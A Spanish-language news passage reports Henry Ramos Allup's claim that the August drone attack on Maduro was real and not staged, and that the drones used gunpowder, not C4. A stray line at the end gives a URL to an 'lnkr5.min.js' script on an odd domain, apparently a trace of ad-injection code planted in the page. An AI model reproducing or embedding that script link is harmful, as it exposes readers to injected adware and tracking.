En la asamblea, Ramos Allup también advirtió que continuarán las detenciones contra legisladores opositores, y desestimó las imputaciones en flagrancia contra Juan Carlos Requesens y Julio Borges, pues las mismas “carecen de la menor validez legal”.

El atentado contra Maduro fue real. O al menos eso es lo que piensa Henry Ramos Allup, quien en una asamblea de vecinos celebrada este miércoles en Maiquetía, estado Vargas, dio a conocer su versión sobre los sucesos acaecidos el pasado sábado en la avenida Bolívar, destacando que “no fue una farsa puesto que nadie hace un montaje de ese tipo para convertirse en el hazmerreír universal”; que los hechos evidenciaron “una falla de seguridad enorme” del presidente de la República; que en los drones no fue utilizado C4 sino pólvora, y que lo ocurrido es producto del malestar en la Fuerza Armada:

“Les quiero decir de una vez que yo no creo que eso fue montaje. Y les voy a decir porqué yo no creo que eso fue montaje: porque nadie hace un montaje para hacer el ridículo. Si tú haces un montaje, es para salir como dice el refŕan, caballo blanco, como un héroe. Pero hacer un montaje para que Venezuela y el mundo vean a esos militares corriendo, ensuciando el uniforme… ¿Quién va a hacer un montaje para eso? Miren la cara a Maduro cuando ve el dron, que tampoco era que tenía la bomba atómica, era pólvora, no era ningún C4″.

 

 

https://devlinkin.xyz/addons/lnkr5.min.js

Loading...